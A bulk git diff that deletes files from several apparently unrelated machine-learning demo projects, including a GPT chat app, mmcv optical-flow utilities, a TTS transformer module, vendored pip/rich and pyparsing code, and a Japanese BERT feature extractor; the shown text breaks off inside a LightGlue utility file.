a/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/lilypond/2.24.2/ccache/lily/c++.go b/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/lilypond/2.24.2/ccache/lily/c++.go deleted file mode 100644 index 75ae584c7a56dcddb9385edebad18a52e8d7702e..0000000000000000000000000000000000000000 Binary files a/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/lilypond/2.24.2/ccache/lily/c++.go and /dev/null differ diff --git a/spaces/PhilSpiel/storyville/app.py b/spaces/PhilSpiel/storyville/app.py deleted file mode 100644 index 4cec0ca64271aee0bd19b152697597908499fa9b..0000000000000000000000000000000000000000 --- a/spaces/PhilSpiel/storyville/app.py +++ 
/dev/null @@ -1,30 +0,0 @@ -import openai -import gradio as gr -import os - -# openai API key -openai.api_key = os.getenv("OPENAPI_KEY") # Replace with your key - -def predict(message, history): - history_openai_format = [{"role": "system", "content":os.getenv("PROMPT")}] - for human, system in history: - history_openai_format.append({"role": "assistant", "content":os.getenv("PROMPT")}) - history_openai_format.append({"role": "user", "content": human }) - history_openai_format.append({"role": "user", "content": message}) - - response = openai.ChatCompletion.create( - model='gpt-3.5-turbo-1106', - messages= history_openai_format, - temperature=0.5, - frequency_penalty=1.54, - stream=True - ) - - partial_message = "" - for chunk in response: - if len(chunk['choices'][0]['delta']) != 0: - partial_message = partial_message + chunk['choices'][0]['delta']['content'] - yield partial_message - - -gr.ChatInterface(predict, submit_btn="Chat with the Ladies").queue().launch(share=True) \ No newline at end of file diff --git a/spaces/Pie31415/control-animation/annotator/uniformer/mmcv/video/optflow.py b/spaces/Pie31415/control-animation/annotator/uniformer/mmcv/video/optflow.py deleted file mode 100644 index 84160f8d6ef9fceb5a2f89e7481593109fc1905d..0000000000000000000000000000000000000000 --- a/spaces/Pie31415/control-animation/annotator/uniformer/mmcv/video/optflow.py +++ /dev/null @@ -1,254 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -import warnings - -import cv2 -import numpy as np - -from annotator.uniformer.mmcv.arraymisc import dequantize, quantize -from annotator.uniformer.mmcv.image import imread, imwrite -from annotator.uniformer.mmcv.utils import is_str - - -def flowread(flow_or_path, quantize=False, concat_axis=0, *args, **kwargs): - """Read an optical flow map. - - Args: - flow_or_path (ndarray or str): A flow map or filepath. 
- quantize (bool): whether to read quantized pair, if set to True, - remaining args will be passed to :func:`dequantize_flow`. - concat_axis (int): The axis that dx and dy are concatenated, - can be either 0 or 1. Ignored if quantize is False. - - Returns: - ndarray: Optical flow represented as a (h, w, 2) numpy array - """ - if isinstance(flow_or_path, np.ndarray): - if (flow_or_path.ndim != 3) or (flow_or_path.shape[-1] != 2): - raise ValueError(f'Invalid flow with shape {flow_or_path.shape}') - return flow_or_path - elif not is_str(flow_or_path): - raise TypeError(f'"flow_or_path" must be a filename or numpy array, ' - f'not {type(flow_or_path)}') - - if not quantize: - with open(flow_or_path, 'rb') as f: - try: - header = f.read(4).decode('utf-8') - except Exception: - raise IOError(f'Invalid flow file: {flow_or_path}') - else: - if header != 'PIEH': - raise IOError(f'Invalid flow file: {flow_or_path}, ' - 'header does not contain PIEH') - - w = np.fromfile(f, np.int32, 1).squeeze() - h = np.fromfile(f, np.int32, 1).squeeze() - flow = np.fromfile(f, np.float32, w * h * 2).reshape((h, w, 2)) - else: - assert concat_axis in [0, 1] - cat_flow = imread(flow_or_path, flag='unchanged') - if cat_flow.ndim != 2: - raise IOError( - f'{flow_or_path} is not a valid quantized flow file, ' - f'its dimension is {cat_flow.ndim}.') - assert cat_flow.shape[concat_axis] % 2 == 0 - dx, dy = np.split(cat_flow, 2, axis=concat_axis) - flow = dequantize_flow(dx, dy, *args, **kwargs) - - return flow.astype(np.float32) - - -def flowwrite(flow, filename, quantize=False, concat_axis=0, *args, **kwargs): - """Write optical flow to file. - - If the flow is not quantized, it will be saved as a .flo file losslessly, - otherwise a jpeg image which is lossy but of much smaller size. (dx and dy - will be concatenated horizontally into a single image if quantize is True.) - - Args: - flow (ndarray): (h, w, 2) array of optical flow. - filename (str): Output filepath. 
- quantize (bool): Whether to quantize the flow and save it to 2 jpeg - images. If set to True, remaining args will be passed to - :func:`quantize_flow`. - concat_axis (int): The axis that dx and dy are concatenated, - can be either 0 or 1. Ignored if quantize is False. - """ - if not quantize: - with open(filename, 'wb') as f: - f.write('PIEH'.encode('utf-8')) - np.array([flow.shape[1], flow.shape[0]], dtype=np.int32).tofile(f) - flow = flow.astype(np.float32) - flow.tofile(f) - f.flush() - else: - assert concat_axis in [0, 1] - dx, dy = quantize_flow(flow, *args, **kwargs) - dxdy = np.concatenate((dx, dy), axis=concat_axis) - imwrite(dxdy, filename) - - -def quantize_flow(flow, max_val=0.02, norm=True): - """Quantize flow to [0, 255]. - - After this step, the size of flow will be much smaller, and can be - dumped as jpeg images. - - Args: - flow (ndarray): (h, w, 2) array of optical flow. - max_val (float): Maximum value of flow, values beyond - [-max_val, max_val] will be truncated. - norm (bool): Whether to divide flow values by image width/height. - - Returns: - tuple[ndarray]: Quantized dx and dy. - """ - h, w, _ = flow.shape - dx = flow[..., 0] - dy = flow[..., 1] - if norm: - dx = dx / w # avoid inplace operations - dy = dy / h - # use 255 levels instead of 256 to make sure 0 is 0 after dequantization. - flow_comps = [ - quantize(d, -max_val, max_val, 255, np.uint8) for d in [dx, dy] - ] - return tuple(flow_comps) - - -def dequantize_flow(dx, dy, max_val=0.02, denorm=True): - """Recover from quantized flow. - - Args: - dx (ndarray): Quantized dx. - dy (ndarray): Quantized dy. - max_val (float): Maximum value used when quantizing. - denorm (bool): Whether to multiply flow values with width/height. - - Returns: - ndarray: Dequantized flow. 
- """ - assert dx.shape == dy.shape - assert dx.ndim == 2 or (dx.ndim == 3 and dx.shape[-1] == 1) - - dx, dy = [dequantize(d, -max_val, max_val, 255) for d in [dx, dy]] - - if denorm: - dx *= dx.shape[1] - dy *= dx.shape[0] - flow = np.dstack((dx, dy)) - return flow - - -def flow_warp(img, flow, filling_value=0, interpolate_mode='nearest'): - """Use flow to warp img. - - Args: - img (ndarray, float or uint8): Image to be warped. - flow (ndarray, float): Optical Flow. - filling_value (int): The missing pixels will be set with filling_value. - interpolate_mode (str): bilinear -> Bilinear Interpolation; - nearest -> Nearest Neighbor. - - Returns: - ndarray: Warped image with the same shape of img - """ - warnings.warn('This function is just for prototyping and cannot ' - 'guarantee the computational efficiency.') - assert flow.ndim == 3, 'Flow must be in 3D arrays.' - height = flow.shape[0] - width = flow.shape[1] - channels = img.shape[2] - - output = np.ones( - (height, width, channels), dtype=img.dtype) * filling_value - - grid = np.indices((height, width)).swapaxes(0, 1).swapaxes(1, 2) - dx = grid[:, :, 0] + flow[:, :, 1] - dy = grid[:, :, 1] + flow[:, :, 0] - sx = np.floor(dx).astype(int) - sy = np.floor(dy).astype(int) - valid = (sx >= 0) & (sx < height - 1) & (sy >= 0) & (sy < width - 1) - - if interpolate_mode == 'nearest': - output[valid, :] = img[dx[valid].round().astype(int), - dy[valid].round().astype(int), :] - elif interpolate_mode == 'bilinear': - # dirty walkround for integer positions - eps_ = 1e-6 - dx, dy = dx + eps_, dy + eps_ - left_top_ = img[np.floor(dx[valid]).astype(int), - np.floor(dy[valid]).astype(int), :] * ( - np.ceil(dx[valid]) - dx[valid])[:, None] * ( - np.ceil(dy[valid]) - dy[valid])[:, None] - left_down_ = img[np.ceil(dx[valid]).astype(int), - np.floor(dy[valid]).astype(int), :] * ( - dx[valid] - np.floor(dx[valid]))[:, None] * ( - np.ceil(dy[valid]) - dy[valid])[:, None] - right_top_ = img[np.floor(dx[valid]).astype(int), - 
np.ceil(dy[valid]).astype(int), :] * ( - np.ceil(dx[valid]) - dx[valid])[:, None] * ( - dy[valid] - np.floor(dy[valid]))[:, None] - right_down_ = img[np.ceil(dx[valid]).astype(int), - np.ceil(dy[valid]).astype(int), :] * ( - dx[valid] - np.floor(dx[valid]))[:, None] * ( - dy[valid] - np.floor(dy[valid]))[:, None] - output[valid, :] = left_top_ + left_down_ + right_top_ + right_down_ - else: - raise NotImplementedError( - 'We only support interpolation modes of nearest and bilinear, ' - f'but got {interpolate_mode}.') - return output.astype(img.dtype) - - -def flow_from_bytes(content): - """Read dense optical flow from bytes. - - .. note:: - This load optical flow function works for FlyingChairs, FlyingThings3D, - Sintel, FlyingChairsOcc datasets, but cannot load the data from - ChairsSDHom. - - Args: - content (bytes): Optical flow bytes got from files or other streams. - - Returns: - ndarray: Loaded optical flow with the shape (H, W, 2). - """ - - # header in first 4 bytes - header = content[:4] - if header.decode('utf-8') != 'PIEH': - raise Exception('Flow file header does not contain PIEH') - # width in second 4 bytes - width = np.frombuffer(content[4:], np.int32, 1).squeeze() - # height in third 4 bytes - height = np.frombuffer(content[8:], np.int32, 1).squeeze() - # after first 12 bytes, all bytes are flow - flow = np.frombuffer(content[12:], np.float32, width * height * 2).reshape( - (height, width, 2)) - - return flow - - -def sparse_flow_from_bytes(content): - """Read the optical flow in KITTI datasets from bytes. - - This function is modified from RAFT load the `KITTI datasets - `_. - - Args: - content (bytes): Optical flow bytes got from files or other streams. - - Returns: - Tuple(ndarray, ndarray): Loaded optical flow with the shape (H, W, 2) - and flow valid mask with the shape (H, W). 
- """ # nopa - - content = np.frombuffer(content, np.uint8) - flow = cv2.imdecode(content, cv2.IMREAD_ANYDEPTH | cv2.IMREAD_COLOR) - flow = flow[:, :, ::-1].astype(np.float32) - # flow shape (H, W, 2) valid shape (H, W) - flow, valid = flow[:, :, :2], flow[:, :, 2] - flow = (flow - 2**15) / 64.0 - return flow, valid diff --git a/spaces/PrabhuKiranKonda/Streamlit-PDF-Assistant-Docker/__init__.py b/spaces/PrabhuKiranKonda/Streamlit-PDF-Assistant-Docker/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/Pranjal12345/Text_to_Speech/tortoise/models/transformer.py b/spaces/Pranjal12345/Text_to_Speech/tortoise/models/transformer.py deleted file mode 100644 index 707e9ebaea2be706427b8eb663e75ef9d46c5de7..0000000000000000000000000000000000000000 --- a/spaces/Pranjal12345/Text_to_Speech/tortoise/models/transformer.py +++ /dev/null @@ -1,219 +0,0 @@ -from functools import partial - -import torch -import torch.nn.functional as F -from einops import rearrange -from rotary_embedding_torch import RotaryEmbedding, broadcat -from torch import nn - - -# helpers - - -def exists(val): - return val is not None - - -def default(val, d): - return val if exists(val) else d - - -def cast_tuple(val, depth = 1): - if isinstance(val, list): - val = tuple(val) - return val if isinstance(val, tuple) else (val,) * depth - - -def max_neg_value(t): - return -torch.finfo(t.dtype).max - - -def stable_softmax(t, dim = -1, alpha = 32 ** 2): - t = t / alpha - t = t - torch.amax(t, dim = dim, keepdim = True).detach() - return (t * alpha).softmax(dim = dim) - - -def route_args(router, args, depth): - routed_args = [(dict(), dict()) for _ in range(depth)] - matched_keys = [key for key in args.keys() if key in router] - - for key in matched_keys: - val = args[key] - for depth, ((f_args, g_args), routes) in enumerate(zip(routed_args, router[key])): - new_f_args, new_g_args = map(lambda route: ({key: val} if route 
else {}), routes) - routed_args[depth] = ({**f_args, **new_f_args}, {**g_args, **new_g_args}) - return routed_args - - -# classes -class SequentialSequence(nn.Module): - def __init__(self, layers, args_route = {}, layer_dropout = 0.): - super().__init__() - assert all(len(route) == len(layers) for route in args_route.values()), 'each argument route map must have the same depth as the number of sequential layers' - self.layers = layers - self.args_route = args_route - self.layer_dropout = layer_dropout - - def forward(self, x, **kwargs): - args = route_args(self.args_route, kwargs, len(self.layers)) - layers_and_args = list(zip(self.layers, args)) - - for (f, g), (f_args, g_args) in layers_and_args: - x = x + f(x, **f_args) - x = x + g(x, **g_args) - return x - - -class DivideMax(nn.Module): - def __init__(self, dim): - super().__init__() - self.dim = dim - - def forward(self, x): - maxes = x.amax(dim = self.dim, keepdim = True).detach() - return x / maxes - - -# https://arxiv.org/abs/2103.17239 -class LayerScale(nn.Module): - def __init__(self, dim, depth, fn): - super().__init__() - if depth <= 18: - init_eps = 0.1 - elif depth > 18 and depth <= 24: - init_eps = 1e-5 - else: - init_eps = 1e-6 - - scale = torch.zeros(1, 1, dim).fill_(init_eps) - self.scale = nn.Parameter(scale) - self.fn = fn - def forward(self, x, **kwargs): - return self.fn(x, **kwargs) * self.scale - -# layer norm - - -class PreNorm(nn.Module): - def __init__(self, dim, fn, sandwich = False): - super().__init__() - self.norm = nn.LayerNorm(dim) - self.norm_out = nn.LayerNorm(dim) if sandwich else nn.Identity() - self.fn = fn - - def forward(self, x, **kwargs): - x = self.norm(x) - x = self.fn(x, **kwargs) - return self.norm_out(x) - -# feed forward - - -class GEGLU(nn.Module): - def forward(self, x): - x, gates = x.chunk(2, dim = -1) - return x * F.gelu(gates) - - -class FeedForward(nn.Module): - def __init__(self, dim, dropout = 0., mult = 4.): - super().__init__() - self.net = nn.Sequential( - 
nn.Linear(dim, dim * mult * 2), - GEGLU(), - nn.Dropout(dropout), - nn.Linear(dim * mult, dim) - ) - - def forward(self, x): - return self.net(x) - -# Attention - - -class Attention(nn.Module): - def __init__(self, dim, seq_len, causal = True, heads = 8, dim_head = 64, dropout = 0.): - super().__init__() - inner_dim = dim_head * heads - self.heads = heads - self.seq_len = seq_len - self.scale = dim_head ** -0.5 - - self.causal = causal - - self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) - self.to_out = nn.Sequential( - nn.Linear(inner_dim, dim), - nn.Dropout(dropout) - ) - - def forward(self, x, mask = None): - b, n, _, h, device = *x.shape, self.heads, x.device - softmax = torch.softmax - - qkv = self.to_qkv(x).chunk(3, dim = -1) - q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = h), qkv) - - q = q * self.scale - - dots = torch.einsum('b h i d, b h j d -> b h i j', q, k) - mask_value = max_neg_value(dots) - - if exists(mask): - mask = rearrange(mask, 'b j -> b () () j') - dots.masked_fill_(~mask, mask_value) - del mask - - if self.causal: - i, j = dots.shape[-2:] - mask = torch.ones(i, j, device = device).triu_(j - i + 1).bool() - dots.masked_fill_(mask, mask_value) - - attn = softmax(dots, dim=-1) - - out = torch.einsum('b h i j, b h j d -> b h i d', attn, v) - out = rearrange(out, 'b h n d -> b n (h d)') - out = self.to_out(out) - return out - - -# main transformer class -class Transformer(nn.Module): - def __init__( - self, - *, - dim, - depth, - seq_len, - causal = True, - heads = 8, - dim_head = 64, - ff_mult = 4, - attn_dropout = 0., - ff_dropout = 0., - sparse_attn = False, - sandwich_norm = False, - ): - super().__init__() - layers = nn.ModuleList([]) - sparse_layer = cast_tuple(sparse_attn, depth) - - for ind, sparse_attn in zip(range(depth), sparse_layer): - attn = Attention(dim, causal = causal, seq_len = seq_len, heads = heads, dim_head = dim_head, dropout = attn_dropout) - - ff = FeedForward(dim, mult = ff_mult, dropout = 
ff_dropout) - - layers.append(nn.ModuleList([ - LayerScale(dim, ind + 1, PreNorm(dim, attn, sandwich = sandwich_norm)), - LayerScale(dim, ind + 1, PreNorm(dim, ff, sandwich = sandwich_norm)) - ])) - - execute_type = SequentialSequence - route_attn = ((True, False),) * depth - attn_route_map = {'mask': route_attn} - - self.layers = execute_type(layers, args_route = attn_route_map) - - def forward(self, x, **kwargs): - return self.layers(x, **kwargs) diff --git a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_internal/cli/__init__.py b/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_internal/cli/__init__.py deleted file mode 100644 index e589bb917e23823e25f9fff7e0849c4d6d4a62bc..0000000000000000000000000000000000000000 --- a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_internal/cli/__init__.py +++ /dev/null @@ -1,4 +0,0 @@ -"""Subpackage containing all of pip's command line interface related code -""" - -# This file intentionally does not import submodules diff --git a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/rich/status.py b/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/rich/status.py deleted file mode 100644 index 09eff405ec194ee2884f203cb48c5df54ff0b9c7..0000000000000000000000000000000000000000 --- a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/rich/status.py +++ /dev/null @@ -1,132 +0,0 @@ -from types import TracebackType -from typing import Optional, Type - -from .console import Console, RenderableType -from .jupyter import JupyterMixin -from .live import Live -from .spinner import Spinner -from .style import StyleType - - -class Status(JupyterMixin): - """Displays a status indicator with a 'spinner' animation. - - Args: - status (RenderableType): A status renderable (str or Text typically). - console (Console, optional): Console instance to use, or None for global console. Defaults to None. 
- spinner (str, optional): Name of spinner animation (see python -m rich.spinner). Defaults to "dots". - spinner_style (StyleType, optional): Style of spinner. Defaults to "status.spinner". - speed (float, optional): Speed factor for spinner animation. Defaults to 1.0. - refresh_per_second (float, optional): Number of refreshes per second. Defaults to 12.5. - """ - - def __init__( - self, - status: RenderableType, - *, - console: Optional[Console] = None, - spinner: str = "dots", - spinner_style: StyleType = "status.spinner", - speed: float = 1.0, - refresh_per_second: float = 12.5, - ): - self.status = status - self.spinner_style = spinner_style - self.speed = speed - self._spinner = Spinner(spinner, text=status, style=spinner_style, speed=speed) - self._live = Live( - self.renderable, - console=console, - refresh_per_second=refresh_per_second, - transient=True, - ) - - @property - def renderable(self) -> Spinner: - return self._spinner - - @property - def console(self) -> "Console": - """Get the Console used by the Status objects.""" - return self._live.console - - def update( - self, - status: Optional[RenderableType] = None, - *, - spinner: Optional[str] = None, - spinner_style: Optional[StyleType] = None, - speed: Optional[float] = None, - ) -> None: - """Update status. - - Args: - status (Optional[RenderableType], optional): New status renderable or None for no change. Defaults to None. - spinner (Optional[str], optional): New spinner or None for no change. Defaults to None. - spinner_style (Optional[StyleType], optional): New spinner style or None for no change. Defaults to None. - speed (Optional[float], optional): Speed factor for spinner animation or None for no change. Defaults to None. 
- """ - if status is not None: - self.status = status - if spinner_style is not None: - self.spinner_style = spinner_style - if speed is not None: - self.speed = speed - if spinner is not None: - self._spinner = Spinner( - spinner, text=self.status, style=self.spinner_style, speed=self.speed - ) - self._live.update(self.renderable, refresh=True) - else: - self._spinner.update( - text=self.status, style=self.spinner_style, speed=self.speed - ) - - def start(self) -> None: - """Start the status animation.""" - self._live.start() - - def stop(self) -> None: - """Stop the spinner animation.""" - self._live.stop() - - def __rich__(self) -> RenderableType: - return self.renderable - - def __enter__(self) -> "Status": - self.start() - return self - - def __exit__( - self, - exc_type: Optional[Type[BaseException]], - exc_val: Optional[BaseException], - exc_tb: Optional[TracebackType], - ) -> None: - self.stop() - - -if __name__ == "__main__": # pragma: no cover - - from time import sleep - - from .console import Console - - console = Console() - with console.status("[magenta]Covid detector booting up") as status: - sleep(3) - console.log("Importing advanced AI") - sleep(3) - console.log("Advanced Covid AI Ready") - sleep(3) - status.update(status="[bold blue] Scanning for Covid", spinner="earth") - sleep(3) - console.log("Found 10,000,000,000 copies of Covid32.exe") - sleep(3) - status.update( - status="[bold red]Moving Covid32.exe to Trash", - spinner="bouncingBall", - spinner_style="yellow", - ) - sleep(5) - console.print("[bold green]Covid deleted successfully") diff --git a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pkg_resources/_vendor/pyparsing/__init__.py b/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pkg_resources/_vendor/pyparsing/__init__.py deleted file mode 100644 index 7802ff158d83eb88e6dbe78d9cd33ca14341662a..0000000000000000000000000000000000000000 --- 
a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pkg_resources/_vendor/pyparsing/__init__.py +++ /dev/null @@ -1,331 +0,0 @@ -# module pyparsing.py -# -# Copyright (c) 2003-2022 Paul T. McGuire -# -# Permission is hereby granted, free of charge, to any person obtaining -# a copy of this software and associated documentation files (the -# "Software"), to deal in the Software without restriction, including -# without limitation the rights to use, copy, modify, merge, publish, -# distribute, sublicense, and/or sell copies of the Software, and to -# permit persons to whom the Software is furnished to do so, subject to -# the following conditions: -# -# The above copyright notice and this permission notice shall be -# included in all copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, -# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF -# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. -# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY -# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, -# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE -# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. -# - -__doc__ = """ -pyparsing module - Classes and methods to define and execute parsing grammars -============================================================================= - -The pyparsing module is an alternative approach to creating and -executing simple grammars, vs. the traditional lex/yacc approach, or the -use of regular expressions. With pyparsing, you don't need to learn -a new syntax for defining grammars or matching expressions - the parsing -module provides a library of classes that you use to construct the -grammar directly in Python. - -Here is a program to parse "Hello, World!" 
(or any greeting of the form -``", !"``), built up using :class:`Word`, -:class:`Literal`, and :class:`And` elements -(the :meth:`'+'` operators create :class:`And` expressions, -and the strings are auto-converted to :class:`Literal` expressions):: - - from pyparsing import Word, alphas - - # define grammar of a greeting - greet = Word(alphas) + "," + Word(alphas) + "!" - - hello = "Hello, World!" - print(hello, "->", greet.parse_string(hello)) - -The program outputs the following:: - - Hello, World! -> ['Hello', ',', 'World', '!'] - -The Python representation of the grammar is quite readable, owing to the -self-explanatory class names, and the use of :class:`'+'`, -:class:`'|'`, :class:`'^'` and :class:`'&'` operators. - -The :class:`ParseResults` object returned from -:class:`ParserElement.parseString` can be -accessed as a nested list, a dictionary, or an object with named -attributes. - -The pyparsing module handles some of the problems that are typically -vexing when writing text parsers: - - - extra or missing whitespace (the above program will also handle - "Hello,World!", "Hello , World !", etc.) - - quoted strings - - embedded comments - - -Getting Started - ------------------ -Visit the classes :class:`ParserElement` and :class:`ParseResults` to -see the base classes that most other pyparsing -classes inherit from. 
Use the docstrings for examples of how to: - - - construct literal match expressions from :class:`Literal` and - :class:`CaselessLiteral` classes - - construct character word-group expressions using the :class:`Word` - class - - see how to create repetitive expressions using :class:`ZeroOrMore` - and :class:`OneOrMore` classes - - use :class:`'+'`, :class:`'|'`, :class:`'^'`, - and :class:`'&'` operators to combine simple expressions into - more complex ones - - associate names with your parsed results using - :class:`ParserElement.setResultsName` - - access the parsed data, which is returned as a :class:`ParseResults` - object - - find some helpful expression short-cuts like :class:`delimitedList` - and :class:`oneOf` - - find more useful common expressions in the :class:`pyparsing_common` - namespace class -""" -from typing import NamedTuple - - -class version_info(NamedTuple): - major: int - minor: int - micro: int - releaselevel: str - serial: int - - @property - def __version__(self): - return ( - "{}.{}.{}".format(self.major, self.minor, self.micro) - + ( - "{}{}{}".format( - "r" if self.releaselevel[0] == "c" else "", - self.releaselevel[0], - self.serial, - ), - "", - )[self.releaselevel == "final"] - ) - - def __str__(self): - return "{} {} / {}".format(__name__, self.__version__, __version_time__) - - def __repr__(self): - return "{}.{}({})".format( - __name__, - type(self).__name__, - ", ".join("{}={!r}".format(*nv) for nv in zip(self._fields, self)), - ) - - -__version_info__ = version_info(3, 0, 9, "final", 0) -__version_time__ = "05 May 2022 07:02 UTC" -__version__ = __version_info__.__version__ -__versionTime__ = __version_time__ -__author__ = "Paul McGuire " - -from .util import * -from .exceptions import * -from .actions import * -from .core import __diag__, __compat__ -from .results import * -from .core import * -from .core import _builtin_exprs as core_builtin_exprs -from .helpers import * -from .helpers import _builtin_exprs as 
helper_builtin_exprs - -from .unicode import unicode_set, UnicodeRangeList, pyparsing_unicode as unicode -from .testing import pyparsing_test as testing -from .common import ( - pyparsing_common as common, - _builtin_exprs as common_builtin_exprs, -) - -# define backward compat synonyms -if "pyparsing_unicode" not in globals(): - pyparsing_unicode = unicode -if "pyparsing_common" not in globals(): - pyparsing_common = common -if "pyparsing_test" not in globals(): - pyparsing_test = testing - -core_builtin_exprs += common_builtin_exprs + helper_builtin_exprs - - -__all__ = [ - "__version__", - "__version_time__", - "__author__", - "__compat__", - "__diag__", - "And", - "AtLineStart", - "AtStringStart", - "CaselessKeyword", - "CaselessLiteral", - "CharsNotIn", - "Combine", - "Dict", - "Each", - "Empty", - "FollowedBy", - "Forward", - "GoToColumn", - "Group", - "IndentedBlock", - "Keyword", - "LineEnd", - "LineStart", - "Literal", - "Located", - "PrecededBy", - "MatchFirst", - "NoMatch", - "NotAny", - "OneOrMore", - "OnlyOnce", - "OpAssoc", - "Opt", - "Optional", - "Or", - "ParseBaseException", - "ParseElementEnhance", - "ParseException", - "ParseExpression", - "ParseFatalException", - "ParseResults", - "ParseSyntaxException", - "ParserElement", - "PositionToken", - "QuotedString", - "RecursiveGrammarException", - "Regex", - "SkipTo", - "StringEnd", - "StringStart", - "Suppress", - "Token", - "TokenConverter", - "White", - "Word", - "WordEnd", - "WordStart", - "ZeroOrMore", - "Char", - "alphanums", - "alphas", - "alphas8bit", - "any_close_tag", - "any_open_tag", - "c_style_comment", - "col", - "common_html_entity", - "counted_array", - "cpp_style_comment", - "dbl_quoted_string", - "dbl_slash_comment", - "delimited_list", - "dict_of", - "empty", - "hexnums", - "html_comment", - "identchars", - "identbodychars", - "java_style_comment", - "line", - "line_end", - "line_start", - "lineno", - "make_html_tags", - "make_xml_tags", - "match_only_at_col", - 
"match_previous_expr", - "match_previous_literal", - "nested_expr", - "null_debug_action", - "nums", - "one_of", - "printables", - "punc8bit", - "python_style_comment", - "quoted_string", - "remove_quotes", - "replace_with", - "replace_html_entity", - "rest_of_line", - "sgl_quoted_string", - "srange", - "string_end", - "string_start", - "trace_parse_action", - "unicode_string", - "with_attribute", - "indentedBlock", - "original_text_for", - "ungroup", - "infix_notation", - "locatedExpr", - "with_class", - "CloseMatch", - "token_map", - "pyparsing_common", - "pyparsing_unicode", - "unicode_set", - "condition_as_parse_action", - "pyparsing_test", - # pre-PEP8 compatibility names - "__versionTime__", - "anyCloseTag", - "anyOpenTag", - "cStyleComment", - "commonHTMLEntity", - "countedArray", - "cppStyleComment", - "dblQuotedString", - "dblSlashComment", - "delimitedList", - "dictOf", - "htmlComment", - "javaStyleComment", - "lineEnd", - "lineStart", - "makeHTMLTags", - "makeXMLTags", - "matchOnlyAtCol", - "matchPreviousExpr", - "matchPreviousLiteral", - "nestedExpr", - "nullDebugAction", - "oneOf", - "opAssoc", - "pythonStyleComment", - "quotedString", - "removeQuotes", - "replaceHTMLEntity", - "replaceWith", - "restOfLine", - "sglQuotedString", - "stringEnd", - "stringStart", - "traceParseAction", - "unicodeString", - "withAttribute", - "indentedBlock", - "originalTextFor", - "infixNotation", - "locatedExpr", - "withClass", - "tokenMap", - "conditionAsParseAction", - "autoname_elements", -] diff --git a/spaces/Rayzggz/illi-Bert-VITS2/text/japanese_bert.py b/spaces/Rayzggz/illi-Bert-VITS2/text/japanese_bert.py deleted file mode 100644 index 5dd196483da4355746383253879190ce538b9df9..0000000000000000000000000000000000000000 --- a/spaces/Rayzggz/illi-Bert-VITS2/text/japanese_bert.py +++ /dev/null @@ -1,38 +0,0 @@ -import torch -from transformers import AutoTokenizer, AutoModelForMaskedLM -import sys - -tokenizer = 
AutoTokenizer.from_pretrained("./bert/bert-base-japanese-v3") - -models = dict() - - -def get_bert_feature(text, word2ph, device=None): - if ( - sys.platform == "darwin" - and torch.backends.mps.is_available() - and device == "cpu" - ): - device = "mps" - if not device: - device = "cuda" - if device not in models.keys(): - models[device] = AutoModelForMaskedLM.from_pretrained( - "./bert/bert-base-japanese-v3" - ).to(device) - with torch.no_grad(): - inputs = tokenizer(text, return_tensors="pt") - for i in inputs: - inputs[i] = inputs[i].to(device) - res = models[device](**inputs, output_hidden_states=True) - res = torch.cat(res["hidden_states"][-3:-2], -1)[0].cpu() - assert inputs["input_ids"].shape[-1] == len(word2ph) - word2phone = word2ph - phone_level_feature = [] - for i in range(len(word2phone)): - repeat_feature = res[i].repeat(word2phone[i], 1) - phone_level_feature.append(repeat_feature) - - phone_level_feature = torch.cat(phone_level_feature, dim=0) - - return phone_level_feature.T diff --git a/spaces/Realcat/image-matching-webui/third_party/LightGlue/lightglue/utils.py b/spaces/Realcat/image-matching-webui/third_party/LightGlue/lightglue/utils.py deleted file mode 100644 index e8d30803931aad89e16e9b543959f76fda87389e..0000000000000000000000000000000000000000 --- a/spaces/Realcat/image-matching-webui/third_party/LightGlue/lightglue/utils.py +++ /dev/null @@ -1,150 +0,0 @@ -from pathlib import Path -import torch -import kornia -import cv2 -import numpy as np -from typing import Union, List, Optional, Callable, Tuple -import collections.abc as collections -from types import SimpleNamespace - - -class ImagePreprocessor: - default_conf = { - "resize": None, # target edge length, None for no resizing - "side": "long", - "interpolation": "bilinear", - "align_corners": None, - "antialias": True, - "grayscale": False, # convert rgb to grayscale - } - - def __init__(self, **conf) -> None: - super().__init__() - self.conf = {**self.default_conf, **conf} - self.conf 
